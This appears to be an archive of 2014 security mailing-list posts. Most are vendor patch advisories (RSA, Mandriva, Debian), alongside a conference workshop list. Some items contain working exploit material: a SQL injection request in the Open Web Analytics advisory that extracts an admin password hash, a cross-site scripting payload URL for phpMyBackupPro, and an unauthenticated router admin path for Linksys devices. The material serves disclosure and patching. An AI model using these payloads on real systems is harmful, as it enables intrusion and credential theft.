ESA-2014-009: RSA BSAFE® SSL-J Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2014-009: RSA BSAFE® SSL-J Multiple Vulnerabilities EMC Identifier: ESA-2014-009 CVE Identifier: CVE-2011-1473, CVE-2014-0625, CVE-2014-0626, CVE-2014-0627 Severity Rating: CVSS v2 Base Score: See below for individual scores Affected Products: All versions of RSA BSAFE SSL-J (SSL-J) 5.x, SSL-J 6.0 Unaffected Products: SSL-J 5.1.3, 6.0.2 and 6.1.x Summary: SSL-J 6.1.x, 6.0.2 and 5.1.3 contain updates designed to prevent multiple potential security vulnerabilities. Addressed issues include: 1. SSL/TLS Renegotiation Denial of Service Vulnerability (CVE-2011-1473) 2. SSLEngine API Information Disclosure Vulnerability (CVE-2014-0627) 3. SSL-J JSAFE and JSSE API Information Disclosure Vulnerability (CVE-2014-0626) 4. SSLSocket Denial of Service Vulnerability (CVE-2014-0625) Details: SSL/TLS Renegotiation Denial of Service Vulnerability (CVE-2011-1473) An application that does not properly restrict client-initiated renegotiation within the SSL and TLS protocols could be vulnerable to a denial of service (CPU consumption) from remote attackers that perform many renegotiations within a single connection. See http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1473 for more information. SSL-J 6.1.x, 6.0.2 and 5.1.3 are designed to include a patch to determine the number of renegotiations that have been initiated by each SSL/TLS client for each connection, and to help ensure that the server can set a limit on renegotiation requests. CVSS v2 Base Score:5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) SSLEngine API Information Disclosure Vulnerability (CVE-2014-0627) When the SSL-J implementation of the SSLEngine API is used, it is possible for Application Data to be sent using the wrap method, after sending the Finished message. However at this time, when the initial handshake is either an abbreviated handshake in server mode or a full handshake in client mode, the handshake is incomplete because the peers Finished message has not been received. This can occur for both the TLS client and server. The Application Data that is sent in this manner could be vulnerable to an attacker forcing the use of a weak cipher suite (if weak cipher suites are enabled). CVSS v2 Base Score: 4.0 (AV:N/AC:H/Au:N/C:P/I:P/A:N) SSL-J JSAFE and JSSE API Information Disclosure Vulnerability (CVE-2014-0626) Unencrypted and unauthenticated Application Data can be received by the client or server during the TLS handshake. This Application Data is indistinguishable from data received after the completion of the handshake. This applies to the SSL-J JSAFE and JSSE APIs. CVSS v2 Base Score: 4.0 (AV:N/AC:H/Au:N/C:P/I:P/A:N) SSLSocket Denial of Service Vulnerability (CVE-2014-0625) If SSLSocket (from both the JSAFE and JSSE APIs) is used, Application Data that is received while a handshake is in progress is placed in an internal buffer. This buffer can grow and use up large amounts of memory. CVSS v2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P) Recommendation: RSA recommends that customers on SSL-J 5.1.x or lower upgrade to SSL-J 5.1.3, 6.0.2 or 6.1.1. RSA recommends that customers on SSL-J 6.0 upgrade to SSL-J 6.0.2 or 6.1.1. The patch to address CVE-2011-1473 is only applicable on the server side. Obtaining Downloads: To request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.emc.com/support/rsa/contact/phone-numbers.htm) for most expedient service. Obtaining Documentation: To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link. Severity Rating: For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Obtaining More Information: For more information about RSA products, visit the RSA web site at http://www.rsa.com. Getting Support and Service: For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab. General Customer Support Information: http://www.emc.com/support/rsa/index.htm RSA SecurCare Online: https://knowledge.rsasecurity.com EOPS Policy: RSA
[ MDVSA-2014:034 ] yaml
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:034 http://www.mandriva.com/en/support/security/ ___ Package : yaml Date: February 14, 2014 Affected: Business Server 1.0 ___ Problem Description: A vulnerability has been discovered and corrected in yaml: The yaml_parser_scan_tag_uri function in scanner.c in LibYAML before 0.1.5 performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted tags in a YAML document, which triggers a heap-based buffer overflow (CVE-2013-6393). The updated packages have been upgraded to the 0.1.5 version which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6393 https://bitbucket.org/xi/libyaml/commits/tag/0.1.5 ___ Updated Packages: Mandriva Business Server 1/X86_64: 1e4b37eb517ff916bc1a4079fc67644c mbs1/x86_64/lib64yaml0_2-0.1.5-1.mbs1.x86_64.rpm 3ef60ab7c95691aafd2cbba52d04da9e mbs1/x86_64/lib64yaml-devel-0.1.5-1.mbs1.x86_64.rpm 1198a9d1904527bb54428bd0aff0 mbs1/SRPMS/yaml-0.1.5-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFS/hELmqjQ0CJFipgRAn0DAJ9msFRiVQ4jseh/oDdDEtvt3QBXuQCfXMy3 YbR3rskDEyaQwTexrQXgviY= =Y0UW -END PGP SIGNATURE-
[ MDVSA-2014:031 ] drupal
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:031 http://www.mandriva.com/en/support/security/ ___ Package : drupal Date: February 14, 2014 Affected: Business Server 1.0 ___ Problem Description: Multiple security issues was identified and fixed in drupal: The OpenID module in Drupal 6.x before 6.30 and 7.x before 7.26 allows remote OpenID users to authenticate as other users via unspecified vectors (CVE-2014-1475). The Taxonomy module in Drupal 7.x before 7.26, when upgraded from an earlier version of Drupal, does not properly restrict access to unpublished content, which allows remote authenticated users to obtain sensitive information via a listing page (CVE-2014-1476). The updated packages has been upgraded to the 7.26 version which is unaffected by these security flaws. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1475 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1476 https://drupal.org/SA-CORE-2014-001 ___ Updated Packages: Mandriva Business Server 1/X86_64: 1561765f33c6a67a7b63ecbc783a8e68 mbs1/x86_64/drupal-7.26-1.mbs1.noarch.rpm 5d8bb1fedd2fc2acfe50272dbc57dc50 mbs1/x86_64/drupal-mysql-7.26-1.mbs1.noarch.rpm 6f4d6b410161ef37d36e055b75ac61bf mbs1/x86_64/drupal-postgresql-7.26-1.mbs1.noarch.rpm 614f9cb70cbb955f445bbb3fc77dc819 mbs1/x86_64/drupal-sqlite-7.26-1.mbs1.noarch.rpm 34636e9e6743b2b8e1e3e4c46156eb6c mbs1/SRPMS/drupal-7.26-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFS/g4OmqjQ0CJFipgRAnyuAKCuYKaLOPAPFDMASVzfPls126i77gCgqb64 GSilzcyyvrDTv2pvUEk/ooY= =IgHR -END PGP SIGNATURE-
[ MDVSA-2014:033 ] socat
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:033 http://www.mandriva.com/en/support/security/ ___ Package : socat Date: February 14, 2014 Affected: Business Server 1.0 ___ Problem Description: A vulnerability has been discovered and corrected in socat: Stack-based buffer overflow in socat 1.3.0.0 through 1.7.2.2 and 2.0.0-b1 through 2.0.0-b6 allows local users to cause a denial of service (segmentation fault) via a long server name in the PROXY-CONNECT address in the command line (CVE-2014-0019). The updated packages have been upgraded to the 1.7.2.3 version which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0019 http://www.dest-unreach.org/socat/contrib/socat-secadv5.txt ___ Updated Packages: Mandriva Business Server 1/X86_64: 556abad28fdb5cc80a15ff69790f4487 mbs1/x86_64/socat-1.7.2.3-1.mbs1.x86_64.rpm 4174e565e7144f2e37712c97163e8292 mbs1/SRPMS/socat-1.7.2.3-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFS/hAYmqjQ0CJFipgRAhMEAKDMEcdwHBt5zIul+3JpAHc0hxIJFwCfaunk ncmqVSK6cQLcTIN5dFoju5Q= =BAB9 -END PGP SIGNATURE-
[ MDVSA-2014:032 ] flite
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:032 http://www.mandriva.com/en/support/security/ ___ Package : flite Date: February 14, 2014 Affected: Business Server 1.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in flite: The play_wave_from_socket function in audio/auserver.c in Flite 1.4 allows local users to modify arbitrary files via a symlink attack on /tmp/awb.wav. NOTE: some of these details are obtained from third party information (CVE-2014-0027). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0027 ___ Updated Packages: Mandriva Business Server 1/X86_64: 9ff31a7d8198f78a479e6b61df16e65a mbs1/x86_64/flite-1.3-2.1.mbs1.x86_64.rpm 27f5093dfbae9b8632064a117229a5ff mbs1/x86_64/lib64flite-devel-1.3-2.1.mbs1.x86_64.rpm 1a7c3036c885f25f810cd61a8fef93b8 mbs1/SRPMS/flite-1.3-2.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFS/g7tmqjQ0CJFipgRAlH3AJsEAY9WoBk/6vXfc777bnO/wmfz4wCgkceT ME9lIRmMcBhgbZisJLF9qms= =UWue -END PGP SIGNATURE-
CISTI'2014: List of Workshops
** WORKSHOPS *** CISTI'2014 - 9th Iberian Conference on Information Systems and Technologies Barcelona, Spain, June 18 - 21, 2014 http://www.aisti.eu/cisti2014/index.php/en/workshops List of Workshops to be held in the CISTI'2014 context: - ARWC 2014 - 1st Workshop on Augmented Reality and Wearable Computing - ASDACS 2014 - 1st Workshop on Applied Statistics and Data Analysis using Computer Science - IoT 2014 - 1st Workshop on Internet of Things - SGaMePlay 2014 - 4th Iberian Workshop on Serious Games and Meaningful Play - TICAMES 2014 - 2nd Workshop on Information and Communication Technology in Higher Education: Learning Mathematics - WICTA 2014 - 1st Workshop on ICT for Audit - WISA 2014 - 6th Workshop on Intelligent Systems and Apllications - WLA 2014 - 1st Workshop on Learning Analytics - WNIS 2014 - 1st Workshop on Networks, Information and Society Detailed information about these workshops is available at http://www.aisti.eu/cisti2014/index.php/en/workshops Best regards, CISTI'2014 Team http://www.aisti.eu/cisti2014/index.php/en
[SWRX-2014-001] Open Web Analytics Pre-Auth SQL Injection
Dell SecureWorks Security Advisory SWRX-2014-001 Open Web Analytics Pre-Auth SQL Injection Advisory Information Title: Open Web Analytics Pre-Auth SQL Injection Advisory ID: SWRX-2014-001 Advisory URL: http://www.secureworks.com/cyber-threat-intelligence/advisories/SWRX-2014-001/ Date published: Thursday, January 9, 2014 CVE: CVE-2014-1206 CVSS v2 base score: 7.5 Date of last update: Wednesday, January 8, 2014 Vendors contacted: Open Web Analytics Release mode: Coordinated Discovered by: Dana James Traversie, Dell SecureWorks Summary Open Web Analytics (OWA) is open source web analytics software that can track and analyze how visitors use websites and applications. OWA is vulnerable to SQL injection that allows an attacker to execute arbitrary SQL statements in the context of the configured OWA database user without authenticating to the web application. Affected products This vulnerability affects Open Web Analytics v1.5.4. Vendor Information, Solutions, and Workarounds The vendor has released an updated version to address this vulnerability. OWA users should upgrade to version v1.5.5 or later. Details An SQL injection vulnerability exists in Open Web Analytics v1.5.4 due to insufficient input validation of the owa_email_address parameter on the password reset page. The password reset page does not require user authentication. A remote attacker can leverage this issue to execute arbitrary SQL statements in the context of the configured OWA database user. The impact of the vulnerability varies based on the deployment and configuration of the OWA, database, and web server software. Successful exploitation could result in complete loss of confidentiality, integrity, and availability in the OWA database and may affect the entire underlying database management system. This issue could also lead to operating system compromise under the right conditions. CVSS severity (version 2.0) Access vector: Network Access complexity: Low Authentication: None Impact type: Manipulation of SQL queries and execution of arbitrary SQL commands on the underlying database Confidentiality impact: Partial Integrity impact: Partial Availability impact: Partial CVSS v2 base score: 7.5 CVSS v2 impact subscore: 6.4 CVSS v2 exploitability subscore: 10 CVSS v2 vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) Proof of concept Request: POST /owa/index.php?owa_do=base.passwordResetForm HTTP/1.1 Host: 10.11.28.70 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.11.28.70/owa/index.php?owa_do=base.passwordResetForm Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 296 owa_email_address=-4534%27+UNION+ALL+SELECT+3627%2C3627%2C3627%2C3627%2C3627%2CCONCAT%280x7177766871%2CIFNULL%28CAST%28password+AS+CHAR%29%2C0x20%29%2C0x7176627971%29%2C3627%2C3627%2C3627%2C3627+FROM+owa.owa_user+LIMIT+0%2C1%23owa_action=base.passwordResetRequestowa_submit=Request+New+Password Response: HTTP/1.1 200 OK Date: Fri, 14 Feb 2014 17:03:43 GMT Server: Apache/2.2.15 (Red Hat) X-Powered-By: PHP/5.3.3 Content-Length: 3538 Connection: close Content-Type: text/html; charset=UTF-8 Invalid address: qwvhqe2744931d91565ed5b44a1d52746afa0qvbyq!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd; html xmlns=http://www.w3.org/1999/xhtml; head meta http-equiv=Content-Type content=text/html; charset=ISO-8859-1 / title - Open Web Analytics/title !-- HEAD Elements -- .. The password hash of the admin user included in the response: e2744931d91565ed5b44a1d52746afa0 Revision history 1.0 2014-01-09: Initial advisory release PGP keys This advisory has been signed with the Dell SecureWorks Counter Threat Unit PGP key, which is available for download at http://www.secureworks.com/SecureWorksCTU.asc. About Dell SecureWorks Dell Inc. (NASDAQ: DELL) listens to customers and delivers worldwide innovative technology and business solutions they trust and value. Recognized as an industry leader by top analysts, Dell SecureWorks provides world-class information security services to help organizations of all sizes protect their IT assets, comply with regulations and reduce security costs. Disclaimer Copyright © 2014 Dell SecureWorks This advisory may not be edited or modified in any way without the express written consent of Dell SecureWorks. Permission is hereby granted to link to this advisory via the Dell SecureWorks website or use in accordance with the fair use doctrine of U.S. copyright laws. See the Dell SecureWorks terms of use at http://www.secureworks.com/contact/terms_of_use/ for additional information. The most recent version of this advisory may be found on the Dell SecureWorks website at
phpMyBackupPro-2.4 Cross-Site Scripting vulnerability
### # phpmybackuppro Cross-Site Scripting vulnerability ### # # # @@@@@@@ @@@@@ @@@ # @@@@@@@@@ @@ @@@ @@@@@ # @@@@@@@@@@@ @@@ @@ @@@ @@@ @@@ # @@@@@@@@@ @@ @@@ @@@@@ @@@ @@@ # @@@@@@@@@ @ @@@@@ @@ # @@@@@@@@@ @@ @@@ @@@@@ @@ # @@@@@@@@@ @@@@@ @@ @@@@@@ @@@ @@@ # @@@@@@@@@ @@ @@@ @@ @@@@@@ @@@ @@@ # @@@@@@@ @@ @@@@@@ @@@ @@@ # # # Exploit Title : phpMyBackupPro-2.4 Cross-Site Scripting vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Email : iedb.t...@gmail.com - o0_shabgard...@yahoo.com # Home : Www.IeDb.Ir/acc - Www.IrIsT.Ir # Fb Page : https://www.facebook.com/iedb.ir # Software Link : http://www.phpmybackuppro.net/download.php # Version : 2.4 # Security Risk : Low # Tested on : Windows # Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F@riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day # E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker # DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini # Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc # # Source : if (isset($_GET['view']) file_exists($_GET['view'])) { if (isset($_GET['download'])) { header(Content-Type: application/octet-stream); header(Content-Disposition: attachment; filename=.basename($_GET['view'])); readfile($_GET['view']); } else { echo pre; while($line=PMBP_getln($_GET['view'])) echo htmlentities($line); PMBP_getln($_GET['view'],true); echo /pre; } } else { if (isset($_GET['view'])) echo $_GET['view']. .F_MAIL_3.!; } Bug : http://127.0.0.1/phpMyBackupPro/get_file.php?view=;scriptalert(/IeDb.Ir/)/script Dem0 : http://iedb.ir/up/imagef-13924803543531-jpg.html # # Tnx To : All Member In Iedb.ir/acc Iranian Hackers # # Exploit Archive = http://www.iedb.ir/exploits-1350.html #
Full Disclosure - Linksys EA2700, EA3500, E4200 and EA4500 - Authentication Bypass to Administrative Console
Vulnerable products : Linksys EA2700, EA3500, E4200, EA4500 Vulnerability: Due to an unknown bug, which occurs by every indication during the installation and/or upgrade process, port 8083 will often open, allowing for direct bypass of authentication to the classic Linksys GUI administrative console for remote unauthenticated users. If vulnerable, an attacker would have complete control of the routers administrative features and functions. On affected models by simply browsing to: http://IP:8083/ a user will be placed into the admin console, with no prompt for authentication. Moreover, by browsing to: http://IP:8083/cgi-bin/ the following four cgi scripts (often there are more depending on the firmware and model) can also be found. fw_sys_up.cgi override.cgi share_editor.cgi switch_boot.cgi It has been observed that Port 443 will show as open to external scans when the vulnerability exists, though not all routers with this open port are affected. On the http header for port 8083, for those affected, Basic Setup is the only item of note observed. An end user should not rely on the router's GUI interface for the status of remote access, as this bug is present when the console shows remote access as disabled. CVE ID: 2013-5122 CWE-288: Authentication Bypass Using an Alternate Path or Channel CVSS Base Score 10 CVSS Temporal Score 8.1 Exploitability Subscore: 10.0 Timeline: The vendor was first notified of this bug in July 2013, and several follow-up conversations have occurred since that time. Patches/Workaround: No known patches or official fixes exist, though some workaround fixes, including reinstallation of the firmware have been often shown to solve the issue. This is not an official workaround and it is strongly advised to contact Linksys support for additional information. Recommendations: - Scan for an open port 8083 from the WAN side of the router to check for this particular vulnerability. - Since an attacker has access to enable FTP service, USB drives mounted on those routers which have them, should be removed until an official fix is out or vulnerability of the router has been ruled out. Research Contacts: Kyle Lovett and Matt Claunch Discovered - July 2013 Updated - February 2014
mbDriveHD v1.0.7 iOS - Multiple Web Vulnerabilities
Document Title: === mbDriveHD v1.0.7 iOS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1198 Release Date: = 2014-02-14 Vulnerability Laboratory ID (VL-ID): 1198 Common Vulnerability Scoring System: 6.7 Product Service Introduction: === mbDriveHD - Turn your iPad into a wireless network disk and document viewer. With mbDriveHD, transferring files to and from your iPad has never been easier! Thanks to our lightning fast Web server build-in, you can use any web browser to transfer your documents and files to/from iPad. This app has a 2.7 star rating, with ratings in 27 markets (36 ratings). It occupies the 165441th position in our ranking with 52 points. It is among the 25% best ones of its category and among the 25% best ones of the overall top. ( Copy of the Homepage: https://itunes.apple.com/us/app/mbdrivehd./id384867710 - Commercial $2.99 ) ( Copy of the Homepage: https://itunes.apple.com/de/app/mbdrivehd-free/id399732602 - Free Edition ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official mbDriveHD v1.0.7 iOS mobile web-application. Vulnerability Disclosure Timeline: == 2014-02-14:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): mbpowertools Product: mbDriveHD - iOS Mobile Web Application 1.0.7 Exploitation Technique: === Local Severity Level: === High Technical Details Description: 1.1 A local file include web vulnerability has been discovered in the official mbDriveHD v1.0.7 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the web-application/device. The web vulnerability is located in the `file name` value of the `Upload` module POST method request. Remote attackers are able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the request method is POST. The local file/path include execution occcurs in the main file index section after the POST method request. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized local file include web attacks. Request Method(s): [+] [POST] Vulnerable Input(s): [+] Upload Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Directory Listing 1.2 A local command/path injection web vulnerability has been discovered in the official mbDriveHD v1.0.7 iOS mobile web-application. The remote vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile application. The vulnerability is located in the in the `device name` value of the `index and sub category listing` module. Local attackers are able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high with a cvss (common vulnerability scoring system) count of 6.0(+)|(-)6.1. Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests. Request Method(s): [+] [GET] Vulnerable Parameter(s): [+] devicename Affected Module(s): [+] Index File Directory Listing - [Header] Proof of Concept (PoC): === 1.1 The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged mobile web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. PoC: Upload [filename] pa href=/abr table width=750tbody tr td width=500a
File Hub v1.9.1 iOS - Multiple Web Vulnerabilities
Document Title: === File Hub v1.9.1 iOS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1195 Release Date: = 2014-02-15 Vulnerability Laboratory ID (VL-ID): 1195 Common Vulnerability Scoring System: 9.1 Product Service Introduction: === File Hub is a powerful and intuitive file manager for iOS. Read, Play, View many file formats, easily transfer files between computer or cloud services and manage files via browser on computer. Voice recorder, text file editor and more. (Copy of the Vendor Homepage: https://itunes.apple.com/en/app/file-hub-usb+wifi+bluetooth+cloud/id520299954 ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple critical web vulnerabilities in the official File Hub v1.9.1 iOS application. Vulnerability Disclosure Timeline: == 2014-02-15:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Apple AppStore Product: File Hub - Mobile Web Application 1.9.1 Exploitation Technique: === Remote Severity Level: === Critical Technical Details Description: 1.1 A critical remote code execution web vulnerability has been discovered in the official File Hub v1.9.1 iOS mobile web-application. The web vulnerability allows remote attackers to execute unauthorized system specific codes or commands to compromise the affected system/service. The vulnerability is located in the `folder rename via edit` and `new folder` function of the file hub wifi application interface. Remote attackers are able to inject own system specific codes as folder/path name to compromise the application. The code execution occurs after the inject via POST method in the main index and the sub category folder. In the sub category folder the code executes in the header location of the application context. In the main index the code execution occurs in the index file dir item list. The security risk of the remote code execution vulnerability in the new folder function is estimated as critical with a cvss (common vulnerability scoring system) count of 9.3(+)|(-)9.4. Exploitation of the code execution vulnerability requires no user interaction or privileged mobile web-application user account with password. Successful exploitation of the remote code execution vulnerability results in mobile application or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] New Folder (Add) Vulnerable Parameter(s): [+] folder name Affected Module(s): [+] Index File Dir Item List - Path Dir Location on Top [+] Sub Category - Header Location to Path 1.2 A local file include web vulnerability has been discovered in the official File Hub v1.9.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the web-application or mobile device. The web vulnerability is located in the `file name` value of the `Files to Upload` module POST method request. Remote attackers are able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the request method is POST. The local file/path include execution occcurs in the main file to path section after the refresh of the file upload. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.3(+)|(-)7.4. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized local file include web attacks. Request Method(s): [+] [POST] Vulnerable Input(s): [+] Files to Upload Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Item List [+] Sub Category File Dir Item List [+] Index File or Item Edit [+] Index File or Item Remove/Delete Proof of Concept (PoC): === 1.1 The remote code execution web vulnerability can be exploited by remote attackers
[SECURITY] [DSA 2861-1] file security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2861-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso February 16, 2014 http://www.debian.org/security/faq - - Package: file Vulnerability : denial of service CVE ID : CVE-2014-1943 Debian Bug : 738832 It was discovered that file, a file type classification tool, contains a flaw in the handling of indirect magic rules in the libmagic library, which leads to an infinite recursion when trying to determine the file type of certain files. The Common Vulnerabilities and Exposures project ID CVE-2014-1943 has been assigned to identify this flaw. Additionally, other well-crafted files might result in long computation times (while using 100% CPU) and overlong results. For the oldstable distribution (squeeze), this problem has been fixed in version 5.04-5+squeeze3. For the stable distribution (wheezy), this problem has been fixed in version 5.11-2+deb7u1. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your file packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJTAMYgAAoJEAVMuPMTQ89EPNgP/11eRauizW+E7pGfWAHuem5s IlNcn3sygrkrxz8uts6l51plw+FCfrGyzRVnZAvTDkDWqkRP8zGsEK/i+Qv/Su9M 2zn0vvovYwunlxoXSax6MqO29jZ1vSOg2CvFAcwCB7kXPSKmw3oWU9Cg3z6pjR/h Tuc0bbQzxp8ztx5P7rIzJqgsaGRhKA+qBhRl2sC9iufJOiJfDn+urI0NOvgTrhxV BNsB14pKXJodXVS/qexsKip4PpEyB/MJRpaXnWkXahe5KmAMsCXspYev6+Nni5BZ BaNk/oxzG9NP21MJOWViI+tGTkPkMWCGMJtaP4iuWjgYEKNUvXL0aO8bsoxbqV39 kKHiiEQdy4a3gii2bYBxJJC92PXex5eI7Dx948xeZKJGHopIqUggovIK0uTP8vsI f+ZaLB7Ul1Vf4FdhcCBEy3S1vZ40nREkOCx/u2UVecSCNmKpbZxnoDpS7kN0w28J wUVFNRVNOEq9ml8L2IG4GFEMlphsfRMDjDwykjp9T4MhoPu5uYHArKf4JM4qcHyt 2HO9l+kxaoHk0umfP3tWozEHGFXpHnyNj6zxUU4//qeUI9UiXUWnJOlv69VbjjYB 7odV735kuGvEyEllLVOH9p2sRZU9N2TR07aSS80/uoE9RV7GtAvFc662zyVzITkW gDJIsrUMBJJB87Sjeig3 =Ixdh -END PGP SIGNATURE-
[SECURITY] [DSA 2862-1] chromium-browser security update
